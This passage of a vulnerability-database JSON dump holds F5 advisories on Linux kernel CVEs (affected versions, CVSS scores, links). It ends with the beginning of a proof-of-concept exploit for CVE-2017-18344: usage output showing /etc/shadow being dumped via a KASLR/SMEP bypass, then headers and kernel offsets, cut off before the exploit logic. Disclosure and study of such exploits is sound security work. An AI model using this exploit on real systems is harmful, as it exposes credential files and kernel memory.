([CVE-2015-5364](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5364>)) \n\n", "cvss3": {}, "published": "2015-09-24T00:00:00", "type": "f5", "title": "SOL17307 - Linux kernel vulnerability CVE-2015-5364", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2015-12-02T00:00:00", "id": "SOL17307", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/300/sol17307.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-10T20:23:06", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 
\n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-10T19:21:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2016-2069", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2069"], "modified": "2017-07-10T19:21:00", "id": "F5:K44500413", "href": "https://support.f5.com/csp/article/K44500413", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:16", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-17T00:00:00", "type": "f5", "title": "SOL80758444 - Linux kernel vulnerability 
CVE-2015-8812", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2016-06-17T00:00:00", "id": "SOL80758444", "href": "http://support.f5.com/kb/en-us/solutions/public/k/80/sol80758444.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-06-01T06:00:49", "description": "drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel before 4.5 does not properly identify error conditions, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted packets. 
([CVE-2015-8812](<https://vulners.com/cve/CVE-2015-8812>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-06-17T19:29:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2015-8812", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2016-06-17T19:29:00", "id": "F5:K80758444", "href": "https://support.f5.com/csp/article/K80758444", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:23:22", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, 
"privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-22T00:00:00", "type": "f5", "title": "SOL01948202 - Linux kernel vulnerability CVE-2016-0728", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-04-26T00:00:00", "id": "SOL01948202", "href": "http://support.f5.com/kb/en-us/solutions/public/k/01/sol01948202.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:40:01", "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 12.0.0 \n11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 12.0.0 \n11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 12.0.0 
| Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe* | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 \n3.3.2 - 3.5.1 | Not vulnerable | None \n \n*F5 WebSafe software is not affected by this vulnerability because the Linux kernel does not form part of the product. 
F5 recommends that customers upgrade the operating system used with the F5 WebSafe Dashboard using the standard OS tools to address CVE-2016-0728.\n\nNone\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-23T02:26:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2016-0728", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2019-05-08T22:08:00", "id": "F5:K01948202", "href": "https://support.f5.com/csp/article/K01948202", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:49:01", "description": "*The affected versions ship with vulnerable code; however, the vulnerability is unlikely to be exploited as BIG-IP, BIG-IQ, and EM systems do not load the vhost-net drivers.\n\nRecommended Action\n\nIf the 
previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, or does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "cvss3": {}, "published": "2014-10-16T00:00:00", "type": "f5", "title": "SOL15699 - Linux kernel vulnerability CVE-2014-0131", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2014-10-16T00:00:00", "id": "SOL15699", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15699.html", "cvss": {"score": 2.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2023-06-01T11:57:37", "description": " \n\n\nUse-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation. 
([CVE-2014-0131](<https://vulners.com/cve/CVE-2014-0131>)) \n\n\nImpact \n\n\nAttackers may be able to obtain sensitive information from kernel memory. \n\n", "cvss3": {}, "published": "2014-10-16T17:10:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2014-0131", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2016-01-08T23:19:00", "id": "F5:K15699", "href": "https://support.f5.com/csp/article/K15699", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-14T00:35:03", "description": "\nF5 Product Development has assigned IDs 648215 and 648217 (BIG-IP), ID 649194 (BIG-IQ), ID 649192 (Enterprise Manager), and ID 649568 (F5 iWorkflow) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 \n | Medium | Linux kernel \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP 
Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 \n12.1.2 HF1 \n | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 | None | Medium | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.5.5 | Medium | Linux kernel \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | Medium | Linux kernel \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | None | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.1.0 | None | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 4.0.2 | 5.0.0 - 5.1.0 \n4.0.5 - 4.4.0 \n4.0.0 | High | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the 
**Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-11T02:23:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2017-6074", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2017-6074"], "modified": "2018-06-10T02:01:00", "id": "F5:K82508682", "href": "https://support.f5.com/csp/article/K82508682", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.14.7 (Ubuntu 16.04 CentOS 7) - (KASLR SMEP Bypass) Arbitrary File Read", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-08-09T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.14.7 (Ubuntu 16.04 CentOS 7) - (KASLR SMEP Bypass) Arbitrary File Read", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2018-08-09T00:00:00", "id": "EXPLOITPACK:CC3E0CE0239066A83BA64B22929DBCEC", "href": "", "sourceData": "// A proof-of-concept exploit for CVE-2017-18344.\n// Includes KASLR and SMEP bypasses. No SMAP bypass.\n// No support for 1 GB pages or 5 level page tables.\n// Tested on Ubuntu xenial 4.4.0-116-generic and 4.13.0-38-generic\n// and on CentOS 7 3.10.0-862.9.1.el7.x86_64.\n//\n// gcc pwn.c -o pwn\n//\n// $ ./pwn search 'root:!:'\n// [.] 
setting up proc reader\n// [~] done\n// [.] checking /proc/cpuinfo\n// [~] looks good\n// [.] setting up timer\n// [~] done\n// [.] finding leak pointer address\n// [+] done: 000000022ca45b60\n// [.] mapping leak pointer page\n// [~] done\n// [.] divide_error: ffffffffad6017b0\n// [.] kernel text: ffffffffacc00000\n// [.] page_offset_base: ffffffffade48a90\n// [.] physmap: ffff8d40c0000000\n// [.] task->mm->pgd: ffffffffade0a000\n// [.] searching [0000000000000000, 00000000f524d000) for 'root:!:':\n// [.] now at 0000000000000000\n// [.] now at 0000000002000000\n// [.] now at 0000000004000000\n// ...\n// [.] now at 000000008c000000\n// [.] now at 000000008e000000\n// [.] now at 0000000090000000\n// [+] found at 0000000090ff3000\n// [+] done\n//\n// $ ./pwn phys 0000000090ff3000 1000 shadow\n// [.] setting up proc reader\n// [~] done\n// [.] checking /proc/cpuinfo\n// [~] looks good\n// [.] setting up timer\n// [~] done\n// [.] finding leak pointer address\n// [+] done: 000000022ca45b60\n// [.] mapping leak pointer page\n// [~] done\n// [.] divide_error: ffffffffad6017b0\n// [.] kernel text: ffffffffacc00000\n// [.] page_offset_base: ffffffffade48a90\n// [.] physmap: ffff8d40c0000000\n// [.] task->mm->pgd: ffffffffade0a000\n// [.] 
dumping physical memory [0000000090ff3000, 0000000090ff4000):\n// [+] done\n//\n// $ cat shadow \n// root:!:17612:0:99999:7:::\n// daemon:*:17590:0:99999:7:::\n// bin:*:17590:0:99999:7:::\n// ...\n// saned:*:17590:0:99999:7:::\n// usbmux:*:17590:0:99999:7:::\n// user:$1$7lXXXXSv$rvXXXXXXXXXXXXXXXXXhr/:17612:0:99999:7:::\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n\n#define _GNU_SOURCE\n\n#include <assert.h>\n#include <ctype.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ioctl.h>\n#include <sys/mman.h>\n#include <sys/stat.h>\n#include <sys/sysinfo.h>\n#include <sys/syscall.h>\n#include <sys/types.h>\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define DEBUG 0\n\n// CentOS 7 3.10.0-862.9.1.el7.x86_64\n#define KERNEL_START\t\t\t0xffffffff81000000ul\n#define O_DIVIDE_ERROR\t\t\t(0xffffffff81723a40ul - KERNEL_START)\n#define O_INIT_TASK\t\t\t(0xffffffff81c16480ul - KERNEL_START)\n#define O_INIT_MM\t\t\t(0xffffffff81c914a0ul - KERNEL_START)\n#define O_PAGE_OFFSET_BASE\t\t(0xffffffff81c41440ul - KERNEL_START)\n#define O_TASK_STRUCT_TASKS\t\t1072\n#define O_TASK_STRUCT_MM\t\t1128\n#define O_TASK_STRUCT_PID\t\t1188\n#define O_MM_STRUCT_MMAP\t\t0\n#define O_MM_STRUCT_PGD\t\t\t88\n#define O_VM_AREA_STRUCT_VM_START\t0\n#define O_VM_AREA_STRUCT_VM_END\t\t8\n#define O_VM_AREA_STRUCT_VM_NEXT\t16\n#define O_VM_AREA_STRUCT_VM_FLAGS\t80\n\n#if 0\n// Ubuntu xenial 4.4.0-116-generic\n#define KERNEL_START\t\t\t0xffffffff81000000ul\n#define O_DIVIDE_ERROR\t\t\t(0xffffffff81851240ul - KERNEL_START)\n#define O_INIT_TASK\t\t\t(0xffffffff81e13500ul - KERNEL_START)\n#define O_INIT_MM\t\t\t(0xffffffff81e73c80ul - KERNEL_START)\n#define O_PAGE_OFFSET_BASE\t\t0\n#define O_TASK_STRUCT_TASKS\t\t848\n#define O_TASK_STRUCT_MM\t\t928\n#define 